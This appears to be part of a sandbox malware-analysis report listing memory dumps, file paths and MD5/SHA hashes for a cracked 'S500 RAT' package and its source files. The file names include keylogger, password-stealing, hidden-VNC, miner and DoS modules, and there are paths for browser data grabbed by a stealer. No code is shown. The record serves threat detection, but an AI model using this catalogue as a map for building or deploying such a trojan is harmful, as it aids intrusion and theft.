SHA256 f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512 cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

memory/1360-1274-0x0000000000150000-0x0000000000182000-memory.dmp

memory/2192-1273-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp

memory/2192-1272-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/1360-1275-0x0000000074680000-0x0000000074D6E000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

MD5 af527b22b92a23c38a492c5961cf2643
SHA1 15106adfa13415287b3e9d8deba21df53cb92eda
SHA256 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

memory/2192-1277-0x000000001D010000-0x000000001D250000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

memory/2580-1279-0x0000000000400000-0x0000000000439000-memory.dmp

memory/1360-1281-0x0000000002020000-0x0000000002060000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 8d1e09604f03d722a6203a50d13c476a
SHA1 b5c43ff15b9a01346907e2c96936c1b855719b0e
SHA256 283504cf75629ea4958b2b3e34d1f4e072090d907ce2b829e0fafd4b7598d357
SHA512 6d0eec952abed603a769830d8cef19fff751a207b411a905824585f219aa6f541ff1c84dfd423f7405ee4efdb92ac75e0e78667cb43e245cc48ad9185cb4f26e

memory/2192-1283-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1285-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2028-1286-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1289-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp

memory/2028-1292-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1293-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2028-1291-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1294-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1290-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/2192-1295-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/2028-1296-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1297-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1298-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1299-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/1360-1300-0x0000000074680000-0x0000000074D6E000-memory.dmp

memory/2028-1301-0x0000000000C60000-0x0000000000C92000-memory.dmp

memory/2192-1302-0x0000000001280000-0x00000000012B2000-memory.dmp

memory/2028-1303-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2580-1304-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2192-1305-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/1360-1306-0x0000000002020000-0x0000000002060000-memory.dmp

memory/2192-1307-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1308-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1309-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1310-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2192-1311-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1312-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1313-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/2028-1314-0x000000001C350000-0x000000001C3D0000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

MD5 3aaae3cec15b86693ae9fb8e1507c872
SHA1 ed8d0a139c609eb886482718ec2ecf96cbbe8c84
SHA256 a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b
SHA512 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463

memory/2192-1316-0x000000001BD70000-0x000000001BD7C000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

MD5 c60e527a85f285ddc66c2fcf160b1be7
SHA1 abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA256 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA512 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

memory/2192-1319-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1321-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1324-0x0000000031C80000-0x0000000031CBC000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

MD5 17cbdd9e4cb0ede2fad8c08c05fdaa84
SHA1 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c
SHA256 d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441
SHA512 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

memory/2192-1322-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1326-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1325-0x000000001BD90000-0x000000001BE10000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

MD5 d5b77dfb5f248f3aabc560d8300088c5
SHA1 bbf7bb5f78051a59e725920cea3d54d1e7473cea
SHA256 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55
SHA512 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552

C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

MD5 531208ea558a68c95339bea9517845c3
SHA1 95865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256 dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA512 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm

MD5 feb8d2de1663adc1e141b8f7bb95d6ac
SHA1 a9b1c4d0f522515c940a80876876d782510cb421
SHA256 ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b
SHA512 af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm

MD5 e6fad395145548f21929c4050a70d710
SHA1 97a8780b8a3d25185f83f88c5f320384b4069601
SHA256 c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92
SHA512 857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm

MD5 1efa2056cd994a29fd0d2e983ef7b26e
SHA1 76967624574c43b1e22e9b3ec4ba17139b547633
SHA256 1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d
SHA512 edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm

MD5 78f905ea7378410c450c79ceb3b9012b
SHA1 495f677fd305c78a77e8164f7de7d732e1aca35c
SHA256 50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a
SHA512 ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm

MD5 be38b0526e6d40f44c7b62d8db2c9553
SHA1 5c4c70ae1381b5e51a685f96700340832229c06d
SHA256 f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f
SHA512 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm

MD5 e03eaf459f028cc6fa8669e277c1a17a
SHA1 ea0a775e49e279208962a9179c974969a2cf7e5e
SHA256 a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f
SHA512 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm

MD5 a54153cd522d951f6b360c3bd3de84d0
SHA1 639dbc414f495044c2d705f39ac965212f1c8c30
SHA256 195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa
SHA512 95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt

MD5 f7bbcdd86cbc1d6d0b81720ac1477fde
SHA1 4799c37f86be4dda105ed3468934f70c36339474
SHA256 50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f
SHA512 2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt

MD5 963be96779d4ef26360c2a3af3a53816
SHA1 6991959998c9939e5ededa0d6759a715559c2140
SHA256 f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4
SHA512 4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt

MD5 e9f329a48dcb70c6ad95c8ab8fe82eb0
SHA1 45e25355e67fd2d528467b4117884ffb601552a3
SHA256 5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637
SHA512 62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4

C:\Users\Admin\Desktop\S500 RAT Source Code\readme.txt

MD5 5983ea5e477d9bbd7751a1903e017762
SHA1 e472313990708995c479b50e8ff10c9e1140086d
SHA256 ac9c17fb596e6ee68245d12ac63b9393c9c511fb3afe71448d5e5749cacca1ae
SHA512 5220c7d82a2c1e146ba22c00eb778e97fc19c34efb01a1412b4c7b52731dffb33cb0d5d11a2424d0152a6b61b50521a7dd6c320aa6792c791b88b9ba9a6c16a1

C:\Users\Admin\Desktop\S500 RAT Source Code\Program.cs

MD5 d6b005305acfbe4587508dc3877294a9
SHA1 38d568415346ff78acf79f0d518e7a8e9f6be959
SHA256 adfd734db6c4735f58bdbd5a5c4903f6a88de7b921c8d3c5a2da7e03bce29f3a
SHA512 e7b52e740c572c8dcd9f4a94340dbdf85eed8bc85fd913345aa6835996b574dc7e5b489a4dbcc2fdc74db4a4a782836cac19943a9999747969a9ef9f252db330

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\App.cs

MD5 53a1bc7f4a72237331ecb9aa01da8bd0
SHA1 5b6c10f01e7379ff063df6fc9dfd64ce48155527
SHA256 3b41c5acf029271942597465183c1cafbd1652775d4abb4ee249eb7e4823d3fa
SHA512 5ba23177fc0e4e239dee02ed4974dc22c3def9e4168bee0a0e3361e19a44529ead5ea4b9c82c1e0a321e5c3b959ec371d035b59e82c28fb2f2820ea966a12d01

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\ApplicationSettings.cs

MD5 bf517b0b3a45c9a9451e3656b20a9f52
SHA1 51faa109422107d1573941da825203b3f92c362c
SHA256 5fb10237128d258baa75e30b8b9b48a29c369ab663f238b8539233da74816c5d
SHA512 45bdea0cb0eca0c6d225df6f04afcbd9938907d0c608d27bdfab41697b03c67c078d86a4185297d95fdc9f0b5bfaf60e9b0d6c4e580c48ea33d10b8094979456

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Constants.cs

MD5 27a443d8293a5dbdcd20d66a5276f3d5
SHA1 d25303340a9a7641d8b1a94ac3e1754d28c0493d
SHA256 540d854b4e00858cd71a3744661b5040e81b9b230bd0ddc8ab4e8ddef96061d8
SHA512 a8ca338d9dd62a42f6d6055085cd5761e648f9cb579cda1268c88258800c87f7c05e5a936959c6b6ad8d5f6513b867fb50f3177de9eafc242f0ca06a94a23ed0

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Encryption.cs

MD5 62c65acccd046b1e89a14a281c6838cb
SHA1 f678a5a11db9de94e2bc3851dcdb5f2f66e79fb5
SHA256 027631c1264c3aba3249e584d60f754527642b8df7fe0ffd41624e2a9631d7f6
SHA512 b5ca7cd5a5540201cbebc7bcf3c047bf2252f8c592df6475eb27dd6272a8566ede02dee299894a91466c56311b8432cc936a05a77bba3730dfbd905848932341

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\InfoManager.cs

MD5 7788eff3b5d130358db1a9d5b5d94a86
SHA1 156ec3c54a43031250f7281509870acad29c3e4f
SHA256 f918c37ff46c7fa8139d6e1a721e10fda36ee80074388b356ec9f0aae090678f
SHA512 602211b0e1431a53b897188d045bbc9753238b47f8bdc52c0311391c3311cd7ad84b72be0ca6cd2086e3452f47b3cf832574bd048f3459ff6c7b929d2223aba2

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\User.cs

MD5 590245612bc4e68a666b907a436d7e55
SHA1 9c6e20ad5b6c43ebccb86db9251db4a68a2d766e
SHA256 9b0feb06f9af76fb63fd3231c5b00cb2fc6575bc64f82f9a3d477b43092a7a09
SHA512 f902edd07ca5b22e6626e9c670ac49436a4d938e4123b9762ed1ab35dea0f563e54dd79328c93cf61dbc554f85adde0a8bafbae14da71ee6432caefa6a3dabf0

C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\BuildInfo.cs

MD5 a47f0eb84d4a844f6701449df7b49a5b
SHA1 26324a1ca64a5d20752018e95251cb3d071ade86
SHA256 dbc8c5d2d4a19ffda08dfa1ebec268ccd78b378ddf7a09d5f7d668d2010ec3be
SHA512 77dce702ee16c5d43901262ddea35c741c549c211471ac784e499a16839da68d59f74398b35ab1e28c6a8e888b0efc2a141f3c87e3659338709b7501ccc82c80

C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\Utils.cs

MD5 b2e8e581082f57271651e8d9fe19a40b
SHA1 6d8af5b3b558f2d829b0da5ace4d4c67876cd290
SHA256 331995f462b4d970a7c4f0556e53c7600973f40c8bcea6d8a72c5b40fc4f1598
SHA512 b550b382ec244cf4f52e8b4b156148aea06f6784ae9bfd7923ea7992a2e15604588efbfd732074c439da7d54d5b1a6838ae5aa0b4a17f432efc7fa523850d082

C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FormAbout.cs

MD5 a17915e3f1f17ba1ceba3d59ffe503f1
SHA1 5a0654c3c64613406a36dc0ac86889ca9e8422c3
SHA256 d4da167b054ca0bc40f2c060d3bbe5d4b43f90d1d41b722f1ea14273f7332f46
SHA512 2b654e65214da976254b9400bfeda93365cb0681185b14b101dbb1e2f0ea87e20bc1790ef9c861128f2f3e6bbbe6036b330cb25eb17834c74cafa30204b16fa4

C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmRec.cs

MD5 1d772d1ef6b3ba72be0d41fb569e25ac
SHA1 196c0531b1122ed575af3d1deaa9498a9f01ed1f
SHA256 1fa6f6a85eccb1b84a1206cade3e9c1fbd152d3feb167abb009dd0df741e320a
SHA512 dae5e1524d70592b1b025d964d4df918ab6a47650d0cfb4ccf21e3cf84982945e889077be613b67ed33a58985f56b410b3b94bbdd9dc5021b15455a0761789b5

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleChat.cs

MD5 fad096cd4f2dbb2e05c2994b5812cb13
SHA1 aa016fe79d20771b735af6e816b8675d9f319819
SHA256 6ad8b6df50461c9587fcc97472b91cfaa28dba53fb0aaf15cda7140161ef3c9a
SHA512 9d4a4635de312d676ed4705bc17f76a91503339fa75908632fe8a31717c4f21007c25291f6b254c1e9a9eb85c8be70ec34932d115eb611f04c74fbf5354d8bb8

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFileSearcher.cs

MD5 483622c17b2f1c7bcac04a8574aae2fe
SHA1 6896f388bb201d161c485fb20732d4f84c663d7e
SHA256 f3f27c05bd7829d6883423ce7cba0e9719fb2ff0b661b5f64059eafb73611214
SHA512 bfc48dae2b88cd18051048c893c90a56626b317b834c8829bbcdbdc09d4ecea970102022d1c860b1bc447203f4a9798616157e290f8d1f0f97b8a0759a9a991d

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleDos.cs

MD5 85b26983126bc8f4255f154f1b43026d
SHA1 289705d88a9d80b31614df3c6a1ed63a8e6e093f
SHA256 ba959832e1815982aac245a02dc7189131ae297d3e71f0b79b401e4b9f83d07c
SHA512 ffadd2c1de91f97dedcfb2da2cfba396352f84b47d31c735ef923f159452bc07a18bc49a22bf182b1d5f4849d4799a49a3ba2aa1325836f65a6b759150cc1b16

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleAudio.cs

MD5 e46826f22037990cdcbf2adf56a63ae1
SHA1 806530956a20e6bb5cdb8321b2e8e9d762ffe158
SHA256 c14254a319d4575c45f2a3331f030629aafa990c8b1a6b28ece3cd326ac7b68f
SHA512 33df5e3cf704669ab97e78327ce4db6c6929e40e4f4b586a2f876e9d6c554a46751f7997561c518b0b53ec2361e1bcecfaef5389e71a28e31237a30fb37aeec3

C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmTransfer.cs

MD5 9250ace37a98aa75bbf0e7df7eadc6b4
SHA1 a9777df578a77416b04e95d36307e6e05b40e5ae
SHA256 a4b88b97dbd6d32dbbb925ed4bbbac815e720a339f183cbeb812a3cb85a229c7
SHA512 4ea1cc0d93a068ef6acd18cb43fcee156e44cede08eb89e23da1fbd18af55c81ccb1a1431d6b241aac85954f20e39a55710b8ee776e2f2d343327a791b1c83de

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFun.cs

MD5 ecfa94e4d1626b2d7b5fab42ba6eecff
SHA1 b55b9d388c14dd5b7ccd51a1a6a5d969bdfee90f
SHA256 735f6018d61e7f65cf81b828e751bed543ffa76b187b57f3fdf8eb5e5d22d026
SHA512 1870531cdf538cc6e4fbbe604cabdf00e8483f70b4e8da80717fb546eccb40415f735e85d7fd50ad658d80e247fa33b174072d2182bad983491ffa874f275606

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleHVNC.cs

MD5 4a1d06f0d9fac5fb70a0322773a51f77
SHA1 50e696781672593f8a3ab3149bc7b086a2cee31e
SHA256 9f2b07af21c52b1880a540294b12bfcf3a60744b0f139f8bfd6c7afbb2d0621c
SHA512 689ba12a4fd4c0cae9e85b31a2f0eeeadfe9f756f932f289e3fc4020b54525b165dcbc9fe11dab681c36612f60b93756bd3edf69fb174c8910f324f65f591512

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleKeylogger.cs

MD5 66867585b21dad280d820d04def0edb6
SHA1 cb77bd7066df43851fa0c633b24a53ef3c079d87
SHA256 802cf017ce9b4c065dd3cd9ba8e279127b4ba935bac1037541702e3c73dbf2b7
SHA512 e4c7d900738cea14ea01e31da594ff0e8bcf8487bf4387cfb8f78b00aff9aaeda51177cf060bcf259375810e097553a486192b618012e1272b3178206bcb98c8

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleInformation.cs

MD5 993b8d7378d2249fbb6ce0d1fbd0caf2
SHA1 48eba498f0b64cc1d9235389d68c671a818b2a27
SHA256 460dbf36998b8d267b2b4f748428c3a06a027ce788cb28d73b64f82ece7e6a03
SHA512 aa94aa46b70cde920642e4e3294a3cb99825dd96c06855d76811ca81f805907a92abdcc89e5e1aa35fe4c8c598c63d7c8611a14894b7d6997ad60c53a5bcb8e5

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleProcessManager.cs

MD5 6d2985668bda0e793da1c636775808ee
SHA1 f54bf51f11a3b453592837d2e72790e2d0a285a6
SHA256 cde2ba5e1be41a86eaf359ff6d585677d722f1a7e92d962458f242f2f4517f75
SHA512 7950c3c2e959ed91cd1cf5384eb78d7ef709a900a39e74be9482d17ed87f21f922f00d456999f2d344354f4932a9a34e96b3c08a0537b9e3265d0f2c1ab91843

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlerFileSearcher.cs

MD5 ebb5485590b79bdbf8ae79a63f83e6da
SHA1 021d5f7d2fe64073446efca70c9da3b47c37c59c
SHA256 edb4185f0bdca89cbf2cebc72135e93a11913d99a3d167fef0bd84da57c3bd8c
SHA512 703729773fd015164d3792a0b726c3f227647dbe589c6105d0907de88d71ad93b4aad96c7b2d53716c9cf440b639fa0c51f1a91c3b88771edf658e05bc52c0a1

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleShell.cs

MD5 02dfab19fe896b474e111c5438e1698c
SHA1 4fa009ab41770c7d5b2305a4a07e07167b375f0d
SHA256 c8de8a4f8c8a5df94bc6a485a7440bc21966957f60fb301918af02408b5488cd
SHA512 e92583725f85805471b3b55b6a9f6fa8bd31249780b9bd951ffe9b59cc5d2e35f362dac750db41181ab41f01c1b32a6666e9185fc5cf57001c129a2c7987644d

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleReportWindow.cs

MD5 9764d1ac50cdb0b7212614208967d63f
SHA1 7f9ca9707db0d016ee3f285b4e2f7ee05228a8a0
SHA256 2bb340f96986529f5c23cdbc51bfe04ded6a81f33c6c6e6d8df0b480b117898e
SHA512 abf6e26e0fabe614084f386afeccf2e1c73d6c7ca7702471a45592730f88028dd223cb4981b7ae5e6d91125999a258b421d8ef35549354f5ddc96bb510cfa127

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleThumbnails.cs

MD5 04c8276b921996b82ea3e4dcb46a6903
SHA1 fb3852b13f015051838aa5442e6b7ef412dc0bf0
SHA256 f804baaac0fa4c7706b83f70a877f8b8998bac11ca1cf35f01ed62d3bcb3751c
SHA512 8317e7b79d90762607af931af202c7dd70223adb723c03573f4ea67c06236ed4f148d7b1a07e8ad1df5cb5bf7dba4f8a3bb1d7104032f652b5b7ab65b88c7ab0

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRemoteDesktop.cs

MD5 8dee4aae3ab14cb9c2edcd638c74bbd8
SHA1 11eb87079623c7f98513487dff071be2c4c13cd0
SHA256 01b1270f336c44160a2137d0c8bac252abb21d69280592a964202a6853a87813
SHA512 78080cbb205695493c94c42c06bb875827420fee3a8f1d1090082fa293ec1d4fa9ce85cd82bdd401c6d54229f37ec615804c2ac5f52eea1668d8fd412931eb90

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRecovery.cs

MD5 e93d4932ba858f6a61f67c9a62bd72e3
SHA1 a84a131f2fca55c987a6f10a8530431902227391
SHA256 db63133ff98e2a34a82bbe6a6cb797f83379be1b0cb8546b8332ba8accd32e08
SHA512 a3635926cb344f6bfbfc1837acd252f362c4a3712cae556b5f5248a64f7d706e6ace0de71baa425f801f42ec4959c41a5ebfacb697bbc2b4e4308b28c2a3d23c

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlePassword.cs

MD5 25d0a72cfb2520e7e92347c8016d1fed
SHA1 c50a25e97f9e4ffa1f3a357866b751c2ec1aa0a5
SHA256 2f60396bd4fd1235f701600dde55c355114fe4d6ad3b59a9a26615feb9b824f8
SHA512 630f804e83c3b8a9b826790e5327344e1a5881abf5a31440f87aaa3a95616e5ada3ee4ef6997cb80881b57e2e8450bdea236871d0a1ad31d28bc7f8d36028900

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleNetstat.cs

MD5 8f8786d6be266aab63c51a361cb1890c
SHA1 b8630833c93c17fc6a6f62e1bced0da122ed1fbd
SHA256 3c4b983c453466ddca8f3a6a909680b5c4b4505b1a6e40e9c1b7fd2e82a62101
SHA512 d40b4bb708765065ab0a35a86e13574723e473f020804e30eea90cc00fd5676ff0c797d3aff61d94f2b158c660dbba0346590ab01d3c6173d4518b489083cbe7

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleMiner.cs

MD5 060dc8b25c808fef52c6aae610d22bc8
SHA1 484ebd1f52152840b4f0945838b90ade3984d3f2
SHA256 5d45c4ea68475e71fb1ac0c0c160d25aa887cbf355eac265ce36f742881aafa5
SHA512 06d25becfcce01b37aef3dcd4a9000f08a62bef2b65ab9aa6636196933caadd818521ed30417ed9d2f092abbeae073d5acd129837e70e78817c7b1fc0a26734f

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleLogs.cs

MD5 d85ffc7dc4a70e49867cb4506c892eb0
SHA1 ee660a91ef1c697952145740181e88e51c51f564
SHA256 df6baead08beeeae2101989ca93dd0dfb1eec6d5b1ea76386e44f275faa75a59
SHA512 e1b7fcfd74eeb4259fa1f449b93debe74ce38c8970bdcfc5ccb0de82e3d532b11e861bb59482d6872f9dfbcf427b8d16e441d23e3e13301e8f3d9790434e80a5

C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\Compiler.cs

MD5 9a053c7a21cf1dee3cecc32e7ee9b551
SHA1 c42383a966016cd83f58837a811425a16dd01df3
SHA256 9e916b8c881168e511aaaea904660879b8b77c20a0552ff9208edd22c1a86253
SHA512 cc558e54ca3cf08371aef075afde570c8cd0b9dd1af24e5dfc0a28af33a9c0d90f440a24f803bcce337fc2e444a3f92221293a7abdca1b6306fe7eaaf3a53900

C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\ListViewColumnSorter.cs

MD5 bae01e7821ec5afd7ff51fbe94baf083
SHA1 72d7846e5ef290231a45b6b51ef61fb27ce4fcf2
SHA256 8e5186d60147f8a722fcf28b7e1b91b00d082d32401c189eae2c93343bc2e554
SHA512 bca3bd26f5bf05bdbe6e4714e10bff31af8be89f7240e7835d2c3c4f4381134ad13f17aa0eb7c20f1cc47c48c9de47ae47f36d7ba1010a7bd1406ed9ae27b86c

C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\FileInfo.cs

MD5 2f9d9b634b11fb6f2c5b6b1842d1006f
SHA1 d3d66d515ffe1c18fa4af2017df62712f5ffc03b
SHA256 9ad63e3ba242bd5aa970c8255227a7eac600d6f46110b64f51685c98b138010a
SHA512 3f6598f5b9b335f61785d5e18f484c223a516a36167d161f94068fcc4df03b7ae56f20c5e8a543f940ed97019564a84426197836ec15a20910262c5f8c6b6de5

C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\S500 RAT Source Code\Resources\tomem.png

MD5 4aa22d0e14ae3ab96820b5fe3b29c24b
SHA1 92474fa98104670a4d73753b0ce0c3243b0fc751
SHA256 09dad12ed97724088278d93d71e703a617ea062f5dfecd464f91130bc056b5ec
SHA512 90c8295d577eb573b23f6b809f18f2a22fb8bb6a49ad2c2c2c4ad87a3ce922ee263f5a0bc000b119fe61b4cb49e86bdb8ea01a94ed9647329cc14fadc5c86d7c

C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
